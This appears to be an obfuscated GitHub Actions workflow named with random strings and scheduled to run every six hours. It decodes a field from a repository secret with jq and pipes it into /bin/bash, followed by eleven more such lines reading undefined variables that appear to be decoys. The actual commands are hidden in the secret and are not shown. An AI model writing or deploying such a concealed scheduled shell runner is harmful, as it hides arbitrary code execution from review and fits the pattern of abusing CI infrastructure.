name: mingzizxv

on:
  workflow_dispatch:
  schedule:
    - cron: '58 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: mingzizxv
        env:
          rcq0053: ${{ secrets.rcq0053 }}
        run: |
          echo $rcq0053 | jq -r .o0 | /bin/bash
          echo $ha18 | jq -r .cma31148 | /bin/bash
          echo $vookl2751 | jq -r .ua2690 | /bin/bash
          echo $op359 | jq -r .gbfga84842 | /bin/bash
          echo $vg99 | jq -r .ulx265 | /bin/bash
          echo $x77086 | jq -r .zzxha41 | /bin/bash
          echo $upig42926 | jq -r .oyet2173 | /bin/bash
          echo $ix66 | jq -r .r4 | /bin/bash
          echo $pxmvx5 | jq -r .vyxi108 | /bin/bash
          echo $mir506 | jq -r .f34 | /bin/bash
          echo $har58 | jq -r .cxq18402 | /bin/bash
          echo $ha75 | jq -r .q4258 | /bin/bash

